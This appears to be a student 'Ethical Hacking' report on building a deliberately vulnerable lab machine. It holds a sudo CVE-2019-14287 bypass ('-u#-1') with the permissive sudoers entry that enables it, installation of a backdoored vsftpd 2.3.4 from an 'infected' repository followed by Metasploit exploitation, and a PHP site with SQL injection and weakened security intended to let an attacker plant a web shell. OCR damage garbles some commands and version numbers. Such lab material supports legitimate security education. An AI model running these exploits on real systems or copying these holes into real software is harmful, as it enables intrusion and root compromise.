Ethical Hacking Alesci Gabriele, Mobilia Alessio, Tripoli Andrea 30/05/2020 SUDO Vulnerability What is it and what is it for? Sudo, in computer science, is a program for Unix operating sys- tems that, within particular constraints, allows you to run other programs assuming the identity of other users. Some systems like macOS and Ubuntu install SUDO natively, while in others (for examaple, Debian) it should be eventually installed later. The constraints within which SUDO runs programs are expressed in the /etc/sudoers con- figuration file, which is normally only editable by the root user: it defines the users who can execute commands via SUDO, the identities they can assume and the commands that they can perform with any constraints on the parameters, with or without an authentication request. Listing 1: Sample /etc/sudoers. 1 # This FILE MUSTBE EDITED VITH THE ’VISUDO’ COMMANDAS ROOT 2 3 Defaults env_root 4 Default mail_badpass 5 Defaults secure_path="/USR/LOCAL/SBIN:/USR/LOCAL/BIN:/USR/SBIN:/USR/BIN - :/SBIN:/BIN:/SNAP/BIN" 6 7 # User PRIVILEGE SPECIFICATION 8 ROOT ALL=(ALL:ALL) ALL 9 10 # MembersOF THE ADMIN GROUP MAY GAIN ROOT PRIVILEGES 11 %admin ALL=(ALL) ALL 12 13 # Allow MEMBERSOF GROUP SUDOIN EXECUTE ANY COMMAND 14 %sudo ALL=(ALL:ALL) ALL 15 16 #INCLUDEDIR/ETC/SUDOERS.D How safe is it to use SUDO? From a security point of view, however, it is necessary to keep in mind that, although it is possible to limit the commands and the related parameters, SUDO does not carry out any checks on the integrity of the executable files that it is going to start. It is therefore important to make sure that they may not be altered or replaced by non-privileged users, and in particular by those who run them via sudo: otherwise, the non-privileged user could Ethical Hacking Page 1 alter these files in order to execute arbitrary code, and then execute them with the privileges granted via SUDO, effectively creating a security hole. This can be prevented, for example, through the permission mechanism of the operating system. What is the syntax for using SUDO? The general syntax of SUDO is as follows: SUDO [options] [variable1=value1 ...] [--] [command [arg1 ...]] The optional command parameter indicates the command to be executed, and the arg parame- ters are its parameters. The double dash - (optional) indicates that subsequent parameters are not to be considered options or variable assignments. Among the main options are: • -u user It assumes the user identity instead of the root one. • -l Lists the commands that the current user can execute via SUDO. • -s Starts the default shell for the user whose identity is assumed. You can also access the shell as a root user by typing: SUDO SU What is the vulnerability that has been inserted and what is it for? The vulnerability that has been entered into our system is better known as CVE-2019-14287 and mentions In Sudo before 1.8.28, an attacker with access to a Runas ALL sudoer account can bypass certain policy blacklists and session PAM modules, and can cause incorrect logging, by invoking sudo with a crafted user ID. For example, this allows bypass of !root configuration, and USER= logging, for a "sudo -u n#$((0xffffffff))" command. This allows us to obtain root privileges with a user inserted in the /etc/sudoers file and typing a sequence of symbols (with Sudo versions < 1.8.28). How was it installed? To install the SUDO version 1.8.21p2, you must first authenticate as root and uninstall the current version. SU - apt-get REMOVE SUDO Then you need to download the correct version of the file from the official website sudo.ws and extract it. Ethical Hacking Page 2 WGET https://www.sudo.ws/dist/sudo-1.8.21p2.tar.gz Now let’s move on to installing sudo. CD sudo-1.7.21p2 ./configure MAKE MAKE CHECK CHEKINSTALL DPKG -i name-of-package For testing, check the current version that has been installed. SUDO --version Now we need to add the user who could exploit the vulnerability. USERADD -m -s /bin/bas USER PASSWD USER Now you need to go to edit the /etc/sudoers file using the default visudo command (with root) and insert the permissions that the user user can obtain. VISUDO Defaults env_root Default mail_badpass Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin: /usr/bin:/sbin:/bin:/snap/bin" # User PRIVILEGE SPECIFICATION ROOT ALL=(ALL:ALL) ALL USER ALL=(ALL: !root) ALL # Members OF THE ADMIN GROUP MAY GAIN ROOT PRIVILEGES %admin ALL=(ALL) ALL # Allow MEMBERS OF GROUP SUDO IN EXECUTE ANY COMMAND %sudo ALL=(ALL:ALL) ALL #includedir /etc/sudoers.d In this way we allow the user user to obtain the privileges for each operation, despite not being root. How do you perform the exploit? The vulnerability is simple to exploit, by inserting the fol- lowing -u#-1 before the operator, you will get root privileges, as you can see in Figure 1. Ethical Hacking Page 3 Figure 1: Sudo exploit vsftpd Vulnerability What is it and what is it for? vsftpd, (or very secure FTP daemon), is an FTP server for Unix-like systems, including Linux. It is the default FTP server in the Ubuntu, CentOS, Fedora, NimbleX, Slackware and RHEL Linux distributions. vsftpd enables the transfer of files from one computer to another. FTP is a way to transfer files to any computer in the world that is connected to the internet. How safe is it to use vsftpd? vsftpd is currently safe, but in July 2011, it was discovered that vsftpd version 2.3.4 downloadable from the master site had been compromised. Users logging into a compromised vsftpd-2.3.4 server may issue a ":)" smileyface as the username and gain a command shell on port 6200. This was not an issue of a security hole in vsftpd, instead, an unknown attacker had uploaded a different version of vsftpd which contained a backdoor. Since then, the site was moved to Google App Engine. What is the vulnerability that has been inserted? The vulnerability inserted into the system, as previously mentioned, is vsftpd-2.3.4 to allow local access. Why choose vsftpd? We opted to choose the use of the vsftpd vulnerability with respect to the proftpd 1.3.5 vulnerability (equally tested) since it was best incorporated into our system (regarding libraries and dependencies). How was it installed? To install the vsftpd version 2.3.4, you must first authenticate as root and uninstall the current version (if it was installed). Then download the package with the back- door and start the configuration. GIT CLONE https://github.com/nikdubois/vsftpd-2.3.4-infected MV vsftpd-2.3.4-infected VSFTPD CD VSFTPD Before starting the configuration, edit the Makefile file as it had problems with the libraries. NANO Makefile LIBS = ’./vsf_findlibs.sh’ -lcrypt Ethical Hacking Page 4 Then you can start the configuration. MAKE USERADD NOBODY MKDIR /usr/share/empty/ MKDIR /var/ftp USERADD -d /var/ftp FTP CHOWN root.root /var/ftp CHMOD og-w /var/ftp CD /usr/local/man MKDIR man5 MKDIR man8 CD /home/eth/vsfptd CP VSFTPD /usr/local/sbin/vsftpd CP vsftpd.conf.5 /usr/local/man/man5 CP vsftpd.8 /usr/local/man/man8 MAKE INSTALL CP vsftpd.conf /etc Now let’s edit the vsftpd /etc/vsftpd.conf configuration file. Listing 2: Sample /etc/vsftpd.conf. 1 anonymous_enable=NO 2 local_enable=YES 3 write_enable=YES 4 dirmessage_enable=YES 5 xferlog_enable=YES 6 connect_from_port_20=YES 7 8 listen=YES Then, insert the /bin/bash permission in the /etc/passwd file for the previously created. Now you can start the vsftpd daemon with the following command. SUDO /usr/local/sbin/vsftpd & How do you perform the exploit? It is possible to exploit vsftpd using the metasploit tools: SEARCH VSFTPD Ethical Hacking Page 5 USE exploit/unix/ftp/vsftpd_234_backdoor SET PAYLOAD cmd/unix/interact SET RHOSTS EXPLOIT Local access has now been obtained and you will be able to perform operations to obtain more privileges (Figure 2. Figure 2: Sudo exploit Vulnerable Website What is a Website and what is it for? The most common public accessible servers are web servers, so a Website that use a simple MySQL database to store news has been designed in php and javascript. It is named INPS news, winking at recent events, and it is shown in Figure 3. Figure 3: Website Ethical Hacking Page 6 The vulnerability is in the php code. The input value are neither checked nor sanitized and they are concatenated directly in the SQL query. There are different ways to use this vulnerabilities, like injecting code in the url or in the different inputs field in the sites. The sql injection permit to grab passwords from the user of the db and from the admin. But the most serious usage has the purpose to inject a php shell directly in the server and then browse it, in this way an user can obtain a shell and login as the user www-data. To permit this we have disabled some security feature. We have disabled the app armor of mysql. We granted to the root user of the db to write files and added www-data to the same group of mysql, so the Apache web server can read the files created by mysql user. How do you perform the exploit? The vulnerability was tested in different ways. In this section is described a way to obtain the root shell. After testing how the site respond to different inputs you can understand how to inject the web shell.